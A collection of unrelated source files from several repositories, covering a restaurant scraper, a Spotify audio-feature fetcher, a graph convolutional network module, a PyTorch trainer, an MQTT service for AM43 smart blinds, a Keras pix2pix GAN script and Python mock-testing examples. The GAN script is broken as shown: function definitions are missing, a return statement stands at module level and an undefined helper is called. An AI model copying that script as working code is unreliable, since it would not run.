parsed = hours
if len(parsed):
if "." not in str(hours):
parsed = hours + ".00"
return parsed
def sanitize_opening_hour(self, data):
sanitized = data
if len(sanitized):
if ' -' in sanitized:
sanitized = sanitized.replace(' -', '-')
if '.-' in sanitized:
sanitized = sanitized.replace('.-', '.00-')
if sanitized[-1] == '.' and sanitized[-1] != '00.':
sanitized = sanitized[:-1]
if ',' in sanitized:
sanitized = sanitized.replace(',', '')
return sanitized
def patch_data(self, data):
sanitized = data
if len(sanitized):
# Macciavelli fix
if 'Lunch' in sanitized:
sanitized = sanitized.replace('Lunch', '').strip()
# NBSP fix
sanitized = sanitized.replace(
'\xc2\xa0', '')
# remove all extra space
sanitized = " ".join(sanitized.split())
return sanitized
def parse_restaurant_info(self, soup, url):
restaurant_elements = soup.select(__restaurant_infos__)
try:
for restaurant in restaurant_elements:
restaurant_url = self.encode_remove_eol(
restaurant.attrs['data-uri'])
if restaurant_url not in url:
pass
else:
address = self.encode_remove_eol(
restaurant.attrs['data-address'])
zip_code = self.encode_remove_eol(
restaurant.attrs['data-zip'])
post_office = self.encode_remove_eol(
restaurant.attrs['data-city'])
longitude = self.encode_remove_eol(
restaurant.attrs['data-longitude'])
latitude = self.encode_remove_eol(
restaurant.attrs['data-latitude'])
opening_times = self.parse_opening_times(
soup)
restaurant_info = {
"address": address,
"zip_code": zip_code,
"post_office": post_office,
"longitude": longitude,
"latitude": latitude,
"opening_times": opening_times
}
return restaurant_info
except Exception, e:
self.logger.exception(e)
def parse_week_number(self, soup):
head_element = soup.select(
__week_number__)[0].getText().encode("utf-8", "ignore")
week_number = int(re.findall(r"\d\d", head_element)[0])
self.logger.debug("week number: " + str(week_number))
return week_number
def assert_foodlist_exists(self, soup):
menu_list = soup.select(__foodmenu_list__)
lunches = soup.select(__foodmenu_list__ + " .lunch")
menu_isnt_empty = len(menu_list) != 0
lunches_arent_empty = len(lunches) != 0
return (menu_isnt_empty and lunches_arent_empty)
def encode_remove_eol(self, text):
try:
return text.encode('utf-8', 'ignore').strip().replace(
'\n', '').replace('\t', '').replace('\r', '')
except UnicodeEncodeError, e:
self.logger.exception(e)
return text
def encode_split_newline(self, text):
try:
return text.encode('utf-8', 'ignore').strip().replace(
'\t', '').replace('\r', '').split('\n')
except UnicodeEncodeError, e:
self.logger.exception(e)
return text
def load_page(self, link):
try:
self.logger.debug(" Loading page " + link + "...")
html = requests.get(link)
self.logger.debug(" Done.")
return html
except RequestException, e:
self.logger.exception(e)
return 1
def __repr__(self):
return "{0} version {1}".format(self.name, __version__)
``` |
{
"source": "jokineno/Predict-Spotify-Top200",
"score": 3
} |
#### File: Predict-Spotify-Top200/src/audio_features.py
```python
import os
import spotipy
import spotipy.util as util
import pandas as pd
def load_environment():
from dotenv import load_dotenv
load_dotenv()
username = os.getenv("USR")
client_id = os.getenv("ID")
client_secret = os.getenv("SECRET")
redirect_uri = os.getenv("URI")
return username, client_id, client_secret, redirect_uri
def get_audio_features(infile, outfile, username, client_id, client_secret, redirect_uri):
scope = 'user-read-private user-read-playback-state user-modify-playback-state'
# Erase catche and prompt for user permission
try:
token = util.prompt_for_user_token(username,
scope,
client_id=client_id,
client_secret=client_secret,
redirect_uri=redirect_uri)
except Exception:
os.remove(f".cache-{username}")
token = util.prompt_for_user_token(username, scope)
# Create spotify object
sp = spotipy.Spotify(auth=token)
user = sp.current_user()
displayName = user['display_name']
print(">>> Hello", displayName)
data = pd.read_csv(infile)
track_features = sp.audio_features(data.id[0])
track_df = pd.DataFrame(track_features)
df = pd.DataFrame(columns=track_df.columns)
n = 0
for id in data.id:
try:
features = sp.audio_features(id)
except Exception:
continue
n += 1
print(n)
feature_df = pd.DataFrame(features)
df = df.append(feature_df)
index_length = df.shape[0]
index_set = list(range(index_length))
df = df.set_index(pd.Index(index_set))
final_df = data.join(df, lsuffix='_caller', rsuffix='_other')
final_df.to_csv(outfile)
print("DATA JOINING COMPLETED")
print("File saved as:", outfile)
def main():
username, client_id, client_secret, redirect_uri = load_environment()
infile = "data/top_200_weekly.csv"
outfile = "data/top_200_features.csv"
get_audio_features(infile, outfile, username, client_id, client_secret, redirect_uri)
if __name__ == "__main__":
main()
```
#### File: Predict-Spotify-Top200/src/generate_lyrics.py
```python
from textgenrnn import textgenrnn
def main():
textgen = textgenrnn("data/textgenrnn_weights_4epochs.hdf5")
lyrics = textgen.generate(n=50, return_as_list=True)
for row in lyrics:
print(row)
if __name__ == "__main__":
main()
``` |
{
"source": "jokingbear/DM",
"score": 3
} |
#### File: plasma/modules/graph.py
```python
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import torch.nn.functional as func
import pydot
from .commons import Identity
class GraphSequential(nn.Module):
def __init__(self, node_embedding, *args):
"""
:param node_embedding: embedding extracted from text, either numpy or torch tensor
:param args: additional torch module for transformation
"""
super().__init__()
if not torch.is_tensor(node_embedding):
node_embedding = torch.tensor(node_embedding, dtype=torch.float)
self.embedding = nn.Parameter(node_embedding, requires_grad=False)
self.sequential = nn.Sequential(*args)
def forward(self):
return self.sequential(self.embedding)
class GraphLinear(nn.Linear):
def __init__(self, in_channels, out_channels, correlation_matrix, bias=True):
"""
:param in_channels: size of input features
:param out_channels: size of output features
:param correlation_matrix: correlation matrix for information propagation
:param bias: whether to use bias
"""
super().__init__(in_channels, out_channels, bias)
assert isinstance(correlation_matrix, nn.Parameter), "correlation must be nn.Parameter"
self.correlation_matrix = correlation_matrix
def forward(self, x):
prop = torch.matmul(self.correlation_matrix, x)
return super().forward(prop)
class GCN(nn.Module):
def __init__(self, backbone, embeddings, correlations, backbone_features, ratio=0.5, sigmoid=True):
"""
:param embeddings: init embeddings for graph, either numpy or torch.tensor
:param correlations: normalized adjacency matrix in numpy
:param backbone_features: output features of extractor
"""
super().__init__()
self.backbone = backbone
correlations = torch.tensor(correlations, dtype=torch.float)
correlations = nn.Parameter(correlations, requires_grad=False)
bottleneck = int(np.round(backbone_features * ratio))
self.graph = GraphSequential(embeddings, *[
GraphLinear(embeddings.shape[-1], bottleneck, correlations),
nn.LeakyReLU(0.2, inplace=True),
GraphLinear(bottleneck, backbone_features, correlations),
])
self.out = nn.Sigmoid() if sigmoid else Identity()
self.bias = nn.Parameter(torch.zeros(embeddings.shape[0]), requires_grad=True)
self.backbone_features = backbone_features
def forward(self, x):
features = self.backbone(x)
embeddings = self.graph()
logits = func.linear(features, embeddings, self.bias)
result = self.out(logits)
return result
def export_linear(self):
"""
return new gcn with graph replaced with a linear layer
:return: nn.Sequential module
"""
linear = nn.Linear(self.backbone_features, self.graph.embedding.shape[0])
graph = self.graph.eval()
with torch.no_grad():
linear.weight.data = graph()
linear.bias.data = self.bias.data
model = nn.Sequential(*[
self.backbone,
linear,
self.out
])
return model
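# Illustrative only (not part of the original module): one way to wire a feature
# extractor into GCN. The random embedding matrix and identity correlation matrix
# below are placeholders standing in for word embeddings and a label co-occurrence
# matrix; the parameter values are assumptions, not values used by this repo.
def _example_build_gcn(backbone, num_labels=10, embedding_dim=300, backbone_features=512):
    embeddings = np.random.randn(num_labels, embedding_dim).astype('float32')
    correlations = np.eye(num_labels, dtype='float32')
    return GCN(backbone, embeddings, correlations, backbone_features)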
def get_label_correlation(df, columns, return_count=True):
"""
Calculate correlation of columns from data frame
:param df: pandas dataframe
:param columns: colunms to calculate correlation
:param return_count: return occurrence count
:return: correlation and counts
"""
counts = pd.DataFrame(columns=columns, index=columns)
for c1 in columns:
for c2 in columns:
counts.loc[c1, c2] = len(df[(df[c1] == 1) & (df[c2] == 1)])
correlation = counts / np.diag(counts)[:, np.newaxis]
if return_count:
return correlation, counts
else:
return correlation
def get_adjacency_matrix(smooth_corr, neighbor_ratio=0.2):
"""
Get adjacency matrix from smoothed correlation
:param smooth_corr: smoothed correlation matrix as dataframe
:param neighbor_ratio: how strong neighbor nodes affect main nodes
:return: adjacency matrix as dataframe
"""
identity = np.identity(smooth_corr.shape[0])
reweight = smooth_corr - identity
reweight = reweight * neighbor_ratio / (1 - neighbor_ratio) / (reweight.values.sum(axis=0, keepdims=True) + 1e-8)
reweight = reweight + identity
D = reweight.values.sum(axis=1) ** (-0.5)
D = np.diag(D)
normalized = D @ reweight.values.transpose() @ D
return pd.DataFrame(normalized, index=smooth_corr.index, columns=smooth_corr.columns)
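# Sketch of how the two helpers above are typically chained (an assumption about the
# intended usage, not code from this repo): estimate label co-occurrence, binarise it
# with a threshold to obtain the smoothed correlation, then normalise it for the GCN.
def _example_adjacency_pipeline(df, label_columns, threshold=0.4, neighbor_ratio=0.2):
    corr, _ = get_label_correlation(df, label_columns, return_count=True)
    smooth_corr = (corr >= threshold).astype(float)
    return get_adjacency_matrix(smooth_corr, neighbor_ratio=neighbor_ratio)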
def get_graph(corr, threshold=0.4):
"""
draw a pydot graph of correlation
:param corr: dataframe of correlation matrix
:param threshold: threshold to prune correlation
:return: pydot graph
"""
smooth_corr = corr >= threshold
graph = pydot.Dot(graph_type='digraph')
for c1 in corr.columns:
node1 = pydot.Node(c1)
graph.add_node(node1)
for c2 in corr.columns:
if c2 != c1:
node2 = pydot.Node(c2)
if smooth_corr.loc[c1, c2] != 0:
edge = pydot.Edge(node1, node2, label=np.round(corr.loc[c1, c2], decimals=2))
graph.add_edge(edge)
return graph
```
#### File: training/callbacks/base_class.py
```python
import torch.nn as nn
from ..trainers.base_trainer import BaseTrainer
class Callback:
def __init__(self):
self.trainer = None
self.models = None
self.optimizers = None
self.training_config = None
def on_train_begin(self, **train_configs):
pass
def on_train_end(self):
pass
def on_epoch_begin(self, epoch):
pass
def on_epoch_end(self, epoch, logs=None):
pass
def on_training_batch_begin(self, epoch, step, inputs, targets):
pass
def on_training_batch_end(self, epoch, step, inputs, targets, caches, logs=None):
pass
def on_validation_batch_begin(self, epoch, step, inputs, targets):
pass
def on_validation_batch_end(self, epoch, step, inputs, targets, caches):
pass
def set_trainer(self, trainer: BaseTrainer):
self.models = [m.module if isinstance(m, nn.DataParallel) else m for m in trainer.models]
self.optimizers = trainer.optimizers
self.trainer = trainer
def extra_repr(self):
return ""
def __repr__(self):
return f"{type(self).__name__}({self.extra_repr()})"
def __str__(self):
return repr(self)
```
#### File: training/trainers/base_trainer.py
```python
from abc import abstractmethod
from itertools import count
from typing import List, Tuple
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
from ..utils import get_progress, eval_modules
class BaseTrainer:
def __init__(self, models: List[nn.Module], optimizers, loss: nn.Module, metrics=None):
self.models = models
self.optimizers = optimizers
self.loss = loss
self.metrics = metrics or []
self.training = True
def fit(self, train_loader, valid_loader=None, callbacks=None, start_epoch=1):
assert start_epoch > 0, "start epoch must be positive"
callbacks = callbacks or []
[c.set_trainer(self) for c in callbacks]
train_configs = {
"train_loader": train_loader,
"test_loader": valid_loader,
"start_epoch": start_epoch,
}
[c.on_train_begin(**train_configs) for c in callbacks]
try:
for e in count(start=start_epoch):
print(f"epoch {e}")
[c.on_epoch_begin(e) for c in callbacks]
train_logs = self._train_one_epoch(e, train_loader, callbacks)
val_logs = {}
if valid_loader is not None:
val_logs = self._evaluate_one_epoch(valid_loader, e, callbacks)
logs = {**train_logs, **val_logs}
[c.on_epoch_end(e, logs) for c in callbacks]
if not self.training:
break
[c.on_train_end() for c in callbacks]
except Exception as e:
with open("trainer_error.txt", "w+") as handle:
handle.write(str(e))
raise
def _train_one_epoch(self, epoch, train_loader, callbacks):
running_metrics = np.zeros([])
with get_progress(total=len(train_loader), desc="train") as pbar:
for i, data in enumerate(train_loader):
inputs, targets = self._extract_data(data)
[c.on_training_batch_begin(epoch, i, inputs, targets) for c in callbacks]
[m.train().zero_grad() for m in self.models]
loss_dict, caches = self._train_one_batch(inputs, targets)
with torch.no_grad():
measures = self._get_train_measures(inputs, targets, loss_dict, caches)
measures = pd.Series(measures)
running_metrics = running_metrics + measures
logs = measures
[c.on_training_batch_end(epoch, i, inputs, targets, caches, logs) for c in callbacks]
logs = logs.copy()
logs.update(running_metrics / (i + 1))
pbar.set_postfix(logs)
pbar.update()
return logs
def _evaluate_one_epoch(self, test_loader, epoch=0, callbacks=()):
eval_caches = []
with get_progress(total=len(test_loader), desc="eval") as pbar, eval_modules(*self.models):
for i, data in enumerate(test_loader):
inputs, targets = self._extract_data(data)
[c.on_validation_batch_begin(epoch, i, inputs, targets) for c in callbacks]
caches = self._get_eval_cache(inputs, targets)
eval_caches.append(caches)
pbar.update()
[c.on_validation_batch_end(epoch, i, inputs, targets, caches) for c in callbacks]
if torch.is_tensor(eval_caches[0]):
eval_caches = torch.cat(eval_caches, dim=0)
else:
n_pred = len(eval_caches[0])
eval_caches = [torch.cat([c[i] for c in eval_caches], dim=0) for i in range(n_pred)]
logs = self._get_eval_logs(eval_caches)
pbar.set_postfix(logs)
return logs
@abstractmethod
def _extract_data(self, batch_data):
pass
@abstractmethod
def _train_one_batch(self, inputs, targets) -> Tuple[dict, object]:
pass
@abstractmethod
def _get_train_measures(self, inputs, targets, loss_dict, cache) -> dict:
pass
@abstractmethod
def _get_eval_cache(self, inputs, targets):
pass
@abstractmethod
def _get_eval_logs(self, eval_caches) -> dict:
pass
def extra_repr(self):
return ""
def __repr__(self):
return f"{type(self).__name__}({self.extra_repr()})"
def __str__(self):
return repr(self)
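# Minimal concrete trainer, included purely as a sketch of how the abstract hooks
# above fit together; the single-model/single-optimizer layout and the metric names
# are assumptions, not part of the original package.
class _ExampleClassifierTrainer(BaseTrainer):
    def _extract_data(self, batch_data):
        inputs, targets = batch_data
        return inputs, targets
    def _train_one_batch(self, inputs, targets):
        model, optimizer = self.models[0], self.optimizers[0]
        outputs = model(inputs)
        loss = self.loss(outputs, targets)
        loss.backward()
        optimizer.step()
        return {"loss": loss.item()}, outputs.detach()
    def _get_train_measures(self, inputs, targets, loss_dict, cache):
        # report the raw loss; metrics from self.metrics could be added here as well
        return dict(loss_dict)
    def _get_eval_cache(self, inputs, targets):
        return self.models[0](inputs)
    def _get_eval_logs(self, eval_caches):
        # eval_caches is the concatenation of all _get_eval_cache outputs
        return {"eval_samples": float(len(eval_caches))}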
``` |
{
"source": "jokk33/IM906",
"score": 2
} |
#### File: jokk33/IM906/cgan for shoes and cityscapes.py
```python
import numpy as np
import pandas as pd
import scipy
from glob import glob
import numpy as np
import matplotlib.pyplot as plt
from skimage import transform
from __future__ import print_function, division
from keras.layers import Input, Dense, Reshape, Flatten, Dropout, Concatenate
from keras.layers import BatchNormalization, Activation, ZeroPadding2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
from keras.models import Sequential, Model
from keras.optimizers import Adam
import datetime
import sys
import os
from imageio import imread
print(os.listdir("../input"))
def load_data(dataset_name, batch_size=1, is_val=False):
    data_type = "train" if not is_val else "val"
path = glob('../input/%s/%s/%s/*' % (dataset_name,dataset_name, data_type))
batch_images = np.random.choice(path, size=batch_size)
img_res=(128,128)
imgs_A = []
imgs_B = []
for img_path in batch_images:
img = imread(img_path)
h, w, _ = img.shape
_w = int(w/2)
# because in the edges2shoes and maps dataset the input image comes before the ground truth.
if (dataset_name=="edges2shoes" or dataset_name=="maps"):
img_A, img_B = img[:, _w:, :],img[:, :_w, :]
else:
img_A, img_B = img[:, :_w, :], img[:, _w:, :]
# decreasing the resolution
img_A = transform.resize(img_A, img_res) #Ground Truth image
img_B = transform.resize(img_B, img_res) #Input image
# If training => do random flip , this is a trick to avoid overfitting
if not is_val and np.random.random() < 0.5:
img_A = np.fliplr(img_A)
img_B = np.fliplr(img_B)
imgs_A.append(img_A)
imgs_B.append(img_B)
#normalizing the images
imgs_A = np.array(imgs_A)/127.5 - 1.
imgs_B = np.array(imgs_B)/127.5 - 1.
return imgs_A, imgs_B
def load_batch(dataset_name, batch_size=1, is_val=False):
    data_type = "train" if not is_val else "val"
path = glob('../input/%s/%s/%s/*' % (dataset_name,dataset_name, data_type))
n_batches=batch_size
img_res=(128,128)
for i in range(n_batches-1):
batch = path[i*batch_size:(i+1)*batch_size]
imgs_A, imgs_B = [], []
for img in batch:
img = imread(img)
h, w, _ = img.shape
half_w = int(w/2)
# because in the edges2shoes and maps dataset the input image comes before the ground truth.
if (dataset_name=="edges2shoes"or dataset_name=="maps"):
img_A, img_B = img[:, half_w:, :],img[:, :half_w, :]
else:
img_A, img_B = img[:, :half_w, :], img[:, half_w:, :]
img_A = transform.resize(img_A, img_res)#Ground truth image
img_B = transform.resize(img_B, img_res)# input image
# when training => do random flip , this is a trick to avoid overfitting
if not is_val and np.random.random() > 0.5:
img_A = np.fliplr(img_A)
img_B = np.fliplr(img_B)
imgs_A.append(img_A)
imgs_B.append(img_B)
# normalizing the images
imgs_A = np.array(imgs_A)/127.5 - 1.
imgs_B = np.array(imgs_B)/127.5 - 1.
yield imgs_A, imgs_B
def imread(path):
return scipy.misc.imread(path, mode='RGB').astype(np.float)
"""U-Net Generator"""
def conv2d(layer_input, filters, f_size=4, bn=True):
"""Layers used during downsampling"""
d = Conv2D(filters, kernel_size=f_size, strides=2, padding='same')(layer_input)
d = LeakyReLU(alpha=0.2)(d)
if bn:
d = BatchNormalization(momentum=0.8)(d)
return d
def deconv2d(layer_input, skip_input, filters, f_size=4, dropout_rate=0):
"""Layers used during upsampling"""
u = UpSampling2D(size=2)(layer_input)
u = Conv2D(filters, kernel_size=f_size, strides=1, padding='same', activation='relu')(u)
if dropout_rate:
u = Dropout(dropout_rate)(u)
u = BatchNormalization(momentum=0.8)(u)
u = Concatenate()([u, skip_input]) #skip connection
return u
# Image input
d0 = Input(shape=img_shape)
# Downsampling
d1 = conv2d(d0, gf, bn=False)
d2 = conv2d(d1, gf*2)
d3 = conv2d(d2, gf*4)
d4 = conv2d(d3, gf*8)
d5 = conv2d(d4, gf*8)
d6 = conv2d(d5, gf*8)
d7 = conv2d(d6, gf*8)
# Upsampling
u1 = deconv2d(d7, d6, gf*8)
u2 = deconv2d(u1, d5, gf*8)
u3 = deconv2d(u2, d4, gf*8)
u4 = deconv2d(u3, d3, gf*4)
u5 = deconv2d(u4, d2, gf*2)
u6 = deconv2d(u5, d1, gf)
u7 = UpSampling2D(size=2)(u6)
output_img = Conv2D(channels, kernel_size=4, strides=1, padding='same', activation='tanh')(u7)
return Model(d0, output_img)
def build_discriminator():
# a small function to make one layer of the discriminator
def d_layer(layer_input, filters, f_size=4, bn=True):
"""Discriminator layer"""
d = Conv2D(filters, kernel_size=f_size, strides=2, padding='same')(layer_input)
d = LeakyReLU(alpha=0.2)(d)
if bn:
d = BatchNormalization(momentum=0.8)(d)
return d
img_A = Input(shape=img_shape)
img_B = Input(shape=img_shape)
# Concatenate image and conditioning image by channels to produce input
combined_imgs = Concatenate(axis=-1)([img_A, img_B])
d1 = d_layer(combined_imgs, df, bn=False)
d2 = d_layer(d1, df*2)
d3 = d_layer(d2, df*4)
d4 = d_layer(d3, df*8)
validity = Conv2D(1, kernel_size=4, strides=1, padding='same')(d4)
return Model([img_A, img_B], validity)
img_rows = 128
img_cols = 128
channels = 3
img_shape = (img_rows, img_cols, channels)
# Calculate output shape of D (PatchGAN)
patch = int(img_rows / 2**4)
disc_patch = (patch, patch, 1)
# Number of filters in the first layer of G and D
gf = 64
df = 64
optimizer = Adam(0.0002, 0.5)
# Build and compile the discriminator
discriminator = build_discriminator()
discriminator.compile(loss='mse',
optimizer=optimizer,
metrics=['accuracy'])
# Build the generator
generator = build_generator()
# Input images and their conditioning images
img_A = Input(shape=img_shape)
img_B = Input(shape=img_shape)
# By conditioning on B generate a fake version of A
fake_A = generator(img_B)
# For the combined model we will only train the generator
discriminator.trainable = False
# Discriminators determines validity of translated images / condition pairs
valid = discriminator([fake_A, img_B])
combined = Model(inputs=[img_A, img_B], outputs=[valid, fake_A])
combined.compile(loss=['mse', 'mae'],
loss_weights=[1, 100],
optimizer=optimizer)
r, c = 3, 3
imgs_A, imgs_B = load_data(dataset_name,batch_size=3, is_val=True)
fake_A = generator.predict(imgs_B)
gen_imgs = np.concatenate([imgs_B, fake_A, imgs_A])
# Rescale images 0 - 1
gen_imgs = 0.5 * gen_imgs + 0.5
titles = ['Input', 'Output', 'Ground Truth']
fig, axs = plt.subplots(r, c)
cnt = 0
for i in range(r):
for j in range(c):
axs[i,j].imshow(gen_imgs[cnt])
axs[i, j].set_title(titles[i])
axs[i,j].axis('off')
cnt += 1
plt.show()
plt.close()
def train( dataset_name,epochs, batch_size=1, show_interval=10):
start_time = datetime.datetime.now()
# Adversarial loss ground truths
valid = np.ones((batch_size,) + disc_patch)
fake = np.zeros((batch_size,) + disc_patch)
for epoch in range(epochs):
for batch_i, (imgs_A, imgs_B) in enumerate(load_batch(dataset_name,batch_size)):
# Train Discriminator
# Condition on B and generate a translated version
fake_A = generator.predict(imgs_B)
# Train the discriminators (original images = real / generated = Fake)
d_loss_real = discriminator.train_on_batch([imgs_A, imgs_B], valid)
d_loss_fake = discriminator.train_on_batch([fake_A, imgs_B], fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# Train Generator
g_loss = combined.train_on_batch([imgs_A, imgs_B], [valid, imgs_A])
elapsed_time = datetime.datetime.now() - start_time
# Plot the progress
if epoch%10==0:
print ("[Epoch %d/%d] [D loss: %f, acc: %3d%%] [G loss: %f] time: %s" % (epoch, epochs,
d_loss[0], 100*d_loss[1],
g_loss[0],
elapsed_time))
# If at show interval => show generated image samples
if epoch % show_interval == 0:
show_images(dataset_name,epoch, batch_i)
train("cityscapes",epochs=10, batch_size=32, show_interval=10)
#can change epochs to 10/20/50/80
train("edges2shoes",epochs=10, batch_size=32, show_interval=5)
#can change epochs to 10/20/50/80
``` |
{
"source": "jokkebk/livecoding",
"score": 3
} |
#### File: livecoding/Euler16-20/p17.py
```python
def write(n):
small = 'zero one two three four five six seven eight nine \
ten eleven twelve thirteen fourteen fifteen sixteen \
seventeen eighteen nineteen'.split()
    tens = 'twenty thirty forty fifty sixty seventy eighty ninety'.split()
if n<20:
return small[n]
elif n<100:
s = tens[n//10 - 2]
if n%10:
return "%s-%s" % (s, write(n%10))
else:
return s
elif n<1000:
s = "%s hundred" % small[n//100]
return "%s and %s" % (s, write(n%100)) if n % 100 else s
# Python: 'abc' if condition else 'xyz'
# C/C++ etc.:condition ? 'abc' : 'xyz'
else: return 'one thousand'
s = 0
for i in range(1,1001):
s += sum(1 for ch in write(i) if ch >= 'a' and ch <= 'z')
print(s)
``` |
{
"source": "jokke-ilujo/hass-am43-gw",
"score": 2
} |
#### File: hass_am43/services/mqtt_service.py
```python
import am43
import json
from oslo_config import cfg
from twisted.application.internet import ClientService, backoffPolicy
from twisted.internet import task
from twisted.internet.defer import inlineCallbacks, DeferredList
from hass_am43 import logging
CONF = cfg.CONF
log = logging.log
class MQTTService(ClientService):
def __init__(self, endpoint, factory, broker, credentials):
ClientService.__init__(self, endpoint, factory,
retryPolicy=backoffPolicy())
self.broker = broker
if credentials:
self.credentials = credentials
else:
self.credentials = {}
self.blinds = {}
for am43_b in CONF.am43_blinds:
self.blinds[am43_b] = {'mac': getattr(CONF, am43_b).mac_address,
'location': getattr(CONF, am43_b).location}
self.blinds_config = []
for bid, blind in self.blinds.items():
b_conf = {'name': "AM43 Blind",
'device_class': "blind",
'object_id': bid,
'unique_id': self.blinds[bid]['mac'].replace(':', ''),
'platform': "mqtt",
'qos': 2,
'~': "homeassistant/cover/{}".format(bid),
'cmd_t': "~/set",
'set_pos_t': "~/set_position",
'pos_t': "~/position",
'position_open': 0,
'position_closed': 100,
'payload_open': "OPEN",
'payload_close': "CLOSE",
'payload_stop': ''}
self.blinds_config.append(b_conf)
    def _log_failure(self, failure):
log.debug("reported {message}", message=failure.getErrorMessage())
return failure
    def _log_all_pub(self, *args):
log.debug("all publishing complete args={args!r}", args=args)
def startService(self):
log.info("starting MQTT Client Service")
# whenConnected() inherited from ClientService
self.whenConnected().addCallback(self.connect_to_broker)
ClientService.startService(self)
self.task.start(self.interval)
self.conf_task.start(self.interval)
@inlineCallbacks
def connect_to_broker(self, protocol):
'''
Connect to MQTT broker
'''
self.protocol = protocol
self.protocol.onPublish = self.on_publish
self.protocol.onDisconnection = self.on_disconnection
self.protocol.setWindowSize(1)
self.interval = CONF.polling_interval
self.task = task.LoopingCall(self.publish_positions,
CONF.am43_blinds)
self.conf_task = task.LoopingCall(self.publish_config)
try:
yield self.protocol.connect("TwistedMQTT-hass-am43",
keepalive=60,
**self.credentials)
yield self.subscribe()
except Exception as e:
log.error("Connecting to {broker} raised {excp!s}",
broker=self.broker, excp=e)
else:
log.info("Connected and subscribed to {broker}",
broker=self.broker)
def subscribe(self):
def _logGrantedQoS(value):
log.debug("response {value!r}", value=value)
return True
def _logAll(*args):
log.debug("all subscriptions complete args={args!r}", args=args)
d = []
for b_conf in self.blinds_config:
sub = self.protocol.subscribe(b_conf['~'] +
b_conf['set_pos_t'][1:], 2)
sub.addCallbacks(_logGrantedQoS, self._log_failure)
d.append(sub)
sub = self.protocol.subscribe(b_conf['~'] +
b_conf['cmd_t'][1:], 2)
sub.addCallbacks(_logGrantedQoS, self._log_failure)
d.append(sub)
dlist = DeferredList(d, consumeErrors=True)
dlist.addCallback(_logAll)
return dlist
def publish_config(self):
log.debug(" >< Sending config messages >< ")
cl = []
for b_conf in self.blinds_config:
conf_pub = self.protocol.publish(
topic=b_conf['~'] + '/config',
qos=b_conf['qos'],
message=json.dumps(b_conf)
)
conf_pub.addErrback(self._log_failure)
dlist = DeferredList(cl, consumeErrors=True)
dlist.addCallback(self._log_all_pub)
return dlist
def publish_positions(self, keys=[]):
log.debug(" >< Collecting blinds states >< ")
blinds_states = {}
for key in keys:
log.debug((" >< Publish positions >< key:{key} "
"mac:{mac}").format(key=key,
mac=self.blinds[key]['mac']))
blind_engine = am43.search(self.blinds[key]['mac'])
blinds_states[key] = blind_engine.get_properties()
        if not blinds_states:
            return
log.debug(" >< Publishing positions >< ")
states_list = []
for key, states in blinds_states.items():
b_conf = next(item for item in self.blinds_config if
item['object_id'] == key)
topic = b_conf['~'] + b_conf['pos_t'][1:]
states_list.append(
self.protocol.publish(topic=topic,
qos=b_conf['qos'],
message=states['position'])
)
states_list[-1].addErrback(self._log_failure)
dlist = DeferredList(states_list, consumeErrors=True)
dlist.addCallback(self._log_all_pub)
return dlist
def on_publish(self, topic, payload, qos, dup, retain, msgId):
'''
Callback Receiving messages from publisher
'''
log.debug("topic={topic} msg={payload}".format(topic=topic,
payload=payload))
blind = next((item for item in self.blinds_config if
item['~'] + item['set_pos_t'][1:] == topic), False)
if blind:
blind_engine = am43.search(self.blinds[blind['object_id']]['mac'])
else:
blind = next((item for item in self.blinds_config if
item['~'] + item['cmd_t'][1:] == topic), False)
if blind:
blind_engine = am43.search(
self.blinds[blind['object_id']]['mac'])
if payload == "OPEN":
blind_engine.set_postion(pecentage=0)
else:
blind_engine.set_postion(pecentage=100)
def on_disconnection(self, reason):
'''
get notfied of disconnections
and get a deferred for a new protocol object (next retry)
'''
log.debug(" >< Connection was lost ! ><, reason={r}", r=reason)
        self.whenConnected().addCallback(self.connect_to_broker)
``` |
{
"source": "jokki/python_unit_test_examples",
"score": 2
} |
#### File: jokki/python_unit_test_examples/static_class.py
```python
class StaticClass():
def staticMethod():
pass
def staticMethodWithStringArg(s):
pass
def staticMethodWithNumArg(s):
pass
```
#### File: python_unit_test_examples/test/test_exception.py
```python
import unittest
from unittest.mock import Mock, patch, MagicMock
import runme
class TestException(unittest.TestCase):
def setUp(self):
## Whatever goes here gets run before every test case
pass
def tearDown(self):
## Whatever goes here gets run after every test case
pass
def test_exception(self):
with self.assertRaises(runme.RunMeException) as context:
runme.functionThatThrowsException()
self.assertTrue('This is an exception' in str(context.exception))
if __name__ == '__main__':
unittest.main()
```
#### File: python_unit_test_examples/test/test_instance_methods.py
```python
import unittest
from unittest.mock import Mock, patch, MagicMock
import runme
class TestInstanceMethods(unittest.TestCase):
def setUp(self):
## Whatever goes here gets run before every test case
pass
def tearDown(self):
## Whatever goes here gets run after every test case
pass
@patch('runme.InstanceClass')
def test_constructor(self, mockInstanceClass):
runme.useInstanceClass()
mockInstanceClass.assert_called()
@patch('runme.InstanceClass')
def test_callInstanceMethodUsingCustomMockClass(self, mockInstanceClass):
class CustomMockClass():
def __init__(self):
self.someInstanceMethodCalled = False
def someInstanceMethod(self, arg):
self.someInstanceMethodCalled = True
return "Custom mock object!"
def multiArgInstanceMethod(self, a, b):
pass
def isCalled(self):
return self.someInstanceMethodCalled
customMock = CustomMockClass()
mockInstanceClass.return_value = customMock
runme.useInstanceClass()
self.assertTrue(customMock.isCalled())
@patch('runme.InstanceClass.someInstanceMethod')
def test_instanceMethodReturnValue(self, mockInstanceMethod):
mockMessage = "Mocked method!"
mockInstanceMethod.return_value = mockMessage
result = runme.useInstanceClass()
self.assertEqual(result, mockMessage, "Unexpected result!")
@patch('runme.InstanceClass.someInstanceMethod')
def test_instanceMethodArg(self, mockInstanceMethod):
dontCare = "Don't care"
mockInstanceMethod.return_value = dontCare
result = runme.useInstanceClass()
mockInstanceMethod.assert_called_once_with(99)
@patch('runme.InstanceClass.multiArgInstanceMethod')
def test_multiArgInstanceMethodArgs(self, mockMultiArgInstanceMethod):
dontCare = "Don't care"
mockMultiArgInstanceMethod.return_value = dontCare
result = runme.useInstanceClass()
mockMultiArgInstanceMethod.assert_called_once_with(1, 2)
@patch('runme.InstanceClass.getNext')
def test_multiCall(self, mockGetNext):
mockGetNext.side_effect = [4, 5, 6]
self.assertEqual(15, runme.addStuff(), "Wrong result!")
if __name__ == '__main__':
unittest.main()
```
#### File: python_unit_test_examples/test/test_multiple.py
```python
import unittest
from unittest.mock import Mock, patch, MagicMock
import runme
class TestMultipleMockObjects(unittest.TestCase):
def setUp(self):
## Whatever goes here gets run before every test case
pass
def tearDown(self):
